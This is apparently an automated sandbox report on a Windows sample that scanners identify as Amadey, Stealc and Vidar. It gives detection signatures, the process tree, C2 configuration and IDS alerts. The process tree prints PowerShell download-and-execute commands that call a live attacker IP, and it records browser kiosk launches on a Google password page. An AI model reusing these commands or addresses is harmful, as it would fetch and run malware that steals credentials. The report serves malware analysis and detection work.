Edit tour
Windows
Analysis Report
file.exe
Overview
General Information
| Sample name: | file.exe |
| Analysis ID: | 1520887 |
| MD5: | 3fba342adc9a795c9c5f64b00ce01b74 |
| SHA1: | 14378e009a4f05fe71df1600dd975d80201ec994 |
| SHA256: | a693827d725fbe45e3b42813c281f9e2390af7cb21e06a6d8058923917104efd |
| Tags: | exeuser-Bitsight |
| Infos: |   |
 | |
Detection
Amadey, Stealc, Vidar
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell Download and Execute IEX
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Drops PE files to the document folder of the user
Drops PE files to the user root directory
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: PowerShell Base64 Encoded IEX Cmdlet
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious PowerShell Download and Execute Pattern
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the user directory
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Classification
- System is w10x64
file.exe (PID: 2584 cmdline: "C:\Users\ user\Deskt op\file.ex e" MD5: 3FBA342ADC9A795C9C5F64B00CE01B74) 
cmd.exe (PID: 2056 cmdline: "C:\Window s\system32 \cmd.exe" /c start " " "C:\User s\user\Doc umentsAAAE BAFBGI.exe " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 1180 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - DocumentsAAAEBAFBGI.exe (PID: 2156 cmdline:
"C:\Users\ user\Docum entsAAAEBA FBGI.exe" MD5: 12673BCEC0FD27C1931789A78B249FE4) - skotes.exe (PID: 7428 cmdline:
"C:\Users\ user~1\App Data\Local \Temp\abc3 bc1985\sko tes.exe" MD5: 12673BCEC0FD27C1931789A78B249FE4) - bd0759338a.exe (PID: 8824 cmdline:
"C:\Users\ user~1\App Data\Local \Temp\1000 023001\bd0 759338a.ex e" MD5: 3FBA342ADC9A795C9C5F64B00CE01B74) - 0bb986841b.exe (PID: 7504 cmdline:
"C:\Users\ user\10000 26002\0bb9 86841b.exe " MD5: 3FBA342ADC9A795C9C5F64B00CE01B74) 
31b0d64927.exe (PID: 9516 cmdline: "C:\Users\ user~1\App Data\Local \Temp\1000 028001\31b 0d64927.ex e" MD5: F226001BA9FF27C6D4C89D8B800DEB73) 
chrome.exe (PID: 9804 cmdline: "C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ki osk https: //youtube. com/accoun t?=https:/ /accounts. google.com /v3/signin /challenge /pwd MD5: 5BBFA6CBDF4C254EB368D534F9E23C92) - chrome.exe (PID: 10000 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2108 --fi eld-trial- handle=196 4,i,767502 7759563180 752,135280 8191418923 1466,26214 4 /prefetc h:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92) 
powershell.exe (PID: 10100 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -execution policy rem otesigned -File "C:\ Users\user ~1\AppData \Local\Tem p\10000300 41\do.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 10108 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - chrome.exe (PID: 9288 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" http s://youtub e.com/acco unt https: //accounts .google.co m/v3/signi n/challeng e/pwd MD5: 5BBFA6CBDF4C254EB368D534F9E23C92) 
msedge.exe (PID: 9316 cmdline: "C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" https:/ /youtube.c om/account https://a ccounts.go ogle.com/v 3/signin/c hallenge/p wd MD5: 69222B8101B0601CC6663F8381E7E00F) - powershell.exe (PID: 2940 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -execution policy rem otesigned -File "C:\ Users\user ~1\AppData \Local\Tem p\10000311 41\no.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 9964 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - chrome.exe (PID: 7188 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" http s://youtub e.com/acco unt https: //accounts .google.co m/v3/signi n/challeng e/pwd MD5: 5BBFA6CBDF4C254EB368D534F9E23C92) - msedge.exe (PID: 2692 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" https:/ /youtube.c om/account https://a ccounts.go ogle.com/v 3/signin/c hallenge/p wd MD5: 69222B8101B0601CC6663F8381E7E00F) - powershell.exe (PID: 9724 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -execution policy rem otesigned -File "C:\ Users\user \100003204 2\ko.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 6988 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - chrome.exe (PID: 3604 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" http s://youtub e.com/acco unt https: //accounts .google.co m/v3/signi n/challeng e/pwd --ki osk MD5: 5BBFA6CBDF4C254EB368D534F9E23C92) - chrome.exe (PID: 11208 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2032 --fi eld-trial- handle=199 2,i,974337 6680113273 918,390561 0129533083 209,262144 /prefetch :8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92) - powershell.exe (PID: 6128 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -execution policy rem otesigned -File "C:\ Users\user \100003314 2\so.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 5380 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - chrome.exe (PID: 10336 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" http s://youtub e.com/acco unt https: //accounts .google.co m/v3/signi n/challeng e/pwd --ki osk MD5: 5BBFA6CBDF4C254EB368D534F9E23C92) - chrome.exe (PID: 5808 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2072 --fi eld-trial- handle=204 4,i,706194 9694861762 144,266210 7828499649 391,262144 /prefetch :8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92) - powershell.exe (PID: 1252 cmdline:
"C:\Window s\SysWOW64 \WindowsPo werShell\v 1.0\powers hell.exe" -nop -c "i ex(New-Obj ect Net.We bClient).D ownloadStr ing('http: //185.215. 113.103/te st/do.ps1' )" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 1272 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - chrome.exe (PID: 2008 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" http s://youtub e.com/acco unt https: //accounts .google.co m/v3/signi n/challeng e/pwd MD5: 5BBFA6CBDF4C254EB368D534F9E23C92) - chrome.exe (PID: 4220 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2460 --fi eld-trial- handle=177 2,i,143412 1479983286 8158,95648 4712064371 6952,26214 4 /prefetc h:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92) - chrome.exe (PID: 10920 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= audio.mojo m.AudioSer vice --lan g=en-US -- service-sa ndbox-type =audio --m ojo-platfo rm-channel -handle=57 92 --field -trial-han dle=1772,i ,143412147 9983286815 8,95648471 2064371695 2,262144 / prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92) - chrome.exe (PID: 10928 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= video_capt ure.mojom. VideoCaptu reService --lang=en- US --servi ce-sandbox -type=none --mojo-pl atform-cha nnel-handl e=7740 --f ield-trial -handle=17 72,i,14341 2147998328 68158,9564 8471206437 16952,2621 44 /prefet ch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92) - msedge.exe (PID: 6156 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" https:/ /youtube.c om/account https://a ccounts.go ogle.com/v 3/signin/c hallenge/p wd MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 1848 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=net work.mojom .NetworkSe rvice --la ng=en-GB - -service-s andbox-typ e=none --m ojo-platfo rm-channel -handle=10 40 --field -trial-han dle=1452,i ,291692599 671157663, 1555487725 0791269440 ,262144 /p refetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F) - powershell.exe (PID: 3020 cmdline:
"C:\Window s\SysWOW64 \WindowsPo werShell\v 1.0\powers hell.exe" -nop -c "i ex(New-Obj ect Net.We bClient).D ownloadStr ing('http: //185.215. 113.103/te st/no.ps1' )" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 2040 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - chrome.exe (PID: 3924 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" http s://youtub e.com/acco unt https: //accounts .google.co m/v3/signi n/challeng e/pwd MD5: 5BBFA6CBDF4C254EB368D534F9E23C92) - chrome.exe (PID: 4196 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2084 --fi eld-trial- handle=193 2,i,262747 2456794200 823,157537 1283671535 0859,26214 4 /prefetc h:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92) - msedge.exe (PID: 5420 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" https:/ /youtube.c om/account https://a ccounts.go ogle.com/v 3/signin/c hallenge/p wd MD5: 69222B8101B0601CC6663F8381E7E00F) - powershell.exe (PID: 2384 cmdline:
"C:\Window s\SysWOW64 \WindowsPo werShell\v 1.0\powers hell.exe" -nop -c "i ex(New-Obj ect Net.We bClient).D ownloadStr ing('http: //185.215. 113.103/te st/ko.ps1' )" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 1532 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - chrome.exe (PID: 6684 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" http s://youtub e.com/acco unt https: //accounts .google.co m/v3/signi n/challeng e/pwd --ki osk MD5: 5BBFA6CBDF4C254EB368D534F9E23C92) - chrome.exe (PID: 1888 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2064 --fi eld-trial- handle=196 4,i,163743 1248117549 9417,14952 1089555690 29805,2621 44 /prefet ch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92) - powershell.exe (PID: 6348 cmdline:
"C:\Window s\SysWOW64 \WindowsPo werShell\v 1.0\powers hell.exe" -nop -c "i ex(New-Obj ect Net.We bClient).D ownloadStr ing('http: //185.215. 113.103/te st/so.ps1' )" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 2168 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - chrome.exe (PID: 4600 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" http s://youtub e.com/acco unt https: //accounts .google.co m/v3/signi n/challeng e/pwd --ki osk MD5: 5BBFA6CBDF4C254EB368D534F9E23C92) - chrome.exe (PID: 9004 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =596 --fie ld-trial-h andle=2004 ,i,1707774 9247032151 328,135843 2838529739 9515,26214 4 /prefetc h:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
- svchost.exe (PID: 7488 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- msedge.exe (PID: 7804 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --flag- switches-b egin --fla g-switches -end --dis able-nacl --do-not-d e-elevate https://yo utube.com/ account ht tps://acco unts.googl e.com/v3/s ignin/chal lenge/pwd MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 8136 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=net work.mojom .NetworkSe rvice --la ng=en-GB - -service-s andbox-typ e=none --m ojo-platfo rm-channel -handle=21 44 --field -trial-han dle=2108,i ,150158034 1886788318 2,14339705 1854407231 76,262144 /prefetch: 3 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 8436 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=ass et_store.m ojom.Asset StoreServi ce --lang= en-GB --se rvice-sand box-type=a sset_store _service - -mojo-plat form-chann el-handle= 7084 --fie ld-trial-h andle=2108 ,i,1501580 3418867883 182,143397 0518544072 3176,26214 4 /prefetc h:8 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 5924 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=ent ity_extrac tion_servi ce.mojom.E xtractor - -lang=en-G B --servic e-sandbox- type=entit y_extracti on --onnx- enabled-fo r-ee --moj o-platform -channel-h andle=7260 --field-t rial-handl e=2108,i,1 5015803418 867883182, 1433970518 5440723176 ,262144 /p refetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 9644 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=aud io.mojom.A udioServic e --lang=e n-GB --ser vice-sandb ox-type=au dio --mojo -platform- channel-ha ndle=8232 --field-tr ial-handle =2108,i,15 0158034188 67883182,1 4339705185 440723176, 262144 /pr efetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 9652 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=vid eo_capture .mojom.Vid eoCaptureS ervice --l ang=en-GB --service- sandbox-ty pe=none -- mojo-platf orm-channe l-handle=8 376 --fiel d-trial-ha ndle=2108, i,15015803 4188678831 82,1433970 5185440723 176,262144 /prefetch :8 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 7576 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=pri ce_compari son_servic e.mojom.Da taProcesso r --lang=e n-GB --ser vice-sandb ox-type=en tity_extra ction --mo jo-platfor m-channel- handle=932 8 --field- trial-hand le=2108,i, 1501580341 8867883182 ,143397051 8544072317 6,262144 / prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
- skotes.exe (PID: 7212 cmdline:
C:\Users\u ser~1\AppD ata\Local\ Temp\abc3b c1985\skot es.exe MD5: 12673BCEC0FD27C1931789A78B249FE4)
- 0bb986841b.exe (PID: 7036 cmdline:
"C:\Users\ user\10000 26002\0bb9 86841b.exe " MD5: 3FBA342ADC9A795C9C5F64B00CE01B74)
- 31b0d64927.exe (PID: 7368 cmdline:
"C:\Users\ user~1\App Data\Local \Temp\1000 028001\31b 0d64927.ex e" MD5: F226001BA9FF27C6D4C89D8B800DEB73) - chrome.exe (PID: 10372 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ki osk https: //youtube. com/accoun t?=https:/ /accounts. google.com /v3/signin /challenge /pwd MD5: 5BBFA6CBDF4C254EB368D534F9E23C92) - chrome.exe (PID: 10680 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2080 --fi eld-trial- handle=201 2,i,187860 5718583745 922,720116 5119895949 10,262144 /prefetch: 8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
- 0bb986841b.exe (PID: 11168 cmdline:
"C:\Users\ user\10000 26002\0bb9 86841b.exe " MD5: 3FBA342ADC9A795C9C5F64B00CE01B74)
- 31b0d64927.exe (PID: 11040 cmdline:
"C:\Users\ user~1\App Data\Local \Temp\1000 028001\31b 0d64927.ex e" MD5: F226001BA9FF27C6D4C89D8B800DEB73) - chrome.exe (PID: 4592 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ki osk https: //youtube. com/accoun t?=https:/ /accounts. google.com /v3/signin /challenge /pwd MD5: 5BBFA6CBDF4C254EB368D534F9E23C92) - chrome.exe (PID: 1916 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2112 --fi eld-trial- handle=181 2,i,144472 6219579653 1449,18254 6690694672 7723,26214 4 /prefetc h:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| Amadey | Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. | No Attribution |
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| Stealc | Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. | No Attribution |
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| Vidar | Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. | No Attribution |
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Stealc | Yara detected Stealc | Joe Security | ||
| JoeSecurity_Stealc | Yara detected Stealc | Joe Security | ||
| JoeSecurity_Stealc | Yara detected Stealc | Joe Security | ||
| JoeSecurity_Stealc | Yara detected Stealc | Joe Security | ||
| JoeSecurity_Amadey_2 | Yara detected Amadey\'s stealer DLL | Joe Security | ||
| Click to see the 20 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Stealc | Yara detected Stealc | Joe Security | ||
| JoeSecurity_Stealc | Yara detected Stealc | Joe Security | ||
| JoeSecurity_Amadey_2 | Yara detected Amadey\'s stealer DLL | Joe Security | ||
| JoeSecurity_Stealc | Yara detected Stealc | Joe Security | ||
| JoeSecurity_Amadey_2 | Yara detected Amadey\'s stealer DLL | Joe Security | ||
| Click to see the 3 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: | ||
| Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): | ||
| Source: | Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: | ||
| Source: | Author: frack113, Nasreddine Bencherchali: | ||
| Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): | ||
| Source: | Author: vburov: | ||
Data Obfuscation | |
|---|
| Source: | Author: Joe Security: | ||
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-09-28T01:13:52.195233+0200 | 2044696 | 1 | A Network Trojan was detected | 192.168.2.7 | 49791 | 185.215.113.43 | 80 | TCP |
| 2024-09-28T01:13:57.322181+0200 | 2044696 | 1 | A Network Trojan was detected | 192.168.2.7 | 49808 | 185.215.113.43 | 80 | TCP |
| 2024-09-28T01:14:01.029105+0200 | 2044696 | 1 | A Network Trojan was detected | 192.168.2.7 | 49830 | 185.215.113.43 | 80 | TCP |
| 2024-09-28T01:14:04.289247+0200 | 2044696 | 1 | A Network Trojan was detected | 192.168.2.7 | 49846 | 185.215.113.43 | 80 | TCP |
| 2024-09-28T01:14:08.116691+0200 | 2044696 | 1 | A Network Trojan was detected | 192.168.2.7 | 49856 | 185.215.113.43 | 80 | TCP |
| 2024-09-28T01:14:11.443808+0200 | 2044696 | 1 | A Network Trojan was detected | 192.168.2.7 | 49865 | 185.215.113.43 | 80 | TCP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-09-28T01:13:06.633438+0200 | 2044245 | 1 | Malware Command and Control Activity Detected | 185.215.113.37 | 80 | 192.168.2.7 | 49699 | TCP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-09-28T01:13:06.626260+0200 | 2044244 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49699 | 185.215.113.37 | 80 | TCP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-09-28T01:13:06.854983+0200 | 2044246 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49699 | 185.215.113.37 | 80 | TCP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-09-28T01:13:07.854220+0200 | 2044248 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49699 | 185.215.113.37 | 80 | TCP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-09-28T01:13:06.863192+0200 | 2044247 | 1 | Malware Command and Control Activity Detected | 185.215.113.37 | 80 | 192.168.2.7 | 49699 | TCP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-09-28T01:13:06.396516+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49699 | 185.215.113.37 | 80 | TCP |
| 2024-09-28T01:13:58.971213+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49817 | 185.215.113.37 | 80 | TCP |
| 2024-09-28T01:14:25.023183+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49917 | 185.215.113.37 | 80 | TCP |
| 2024-09-28T01:14:36.198509+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49950 | 185.215.113.37 | 80 | TCP |
| 2024-09-28T01:14:45.778243+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49975 | 185.215.113.37 | 80 | TCP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-09-28T01:13:48.153396+0200 | 2856121 | 1 | A Network Trojan was detected | 192.168.2.7 | 49786 | 185.215.113.43 | 80 | TCP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
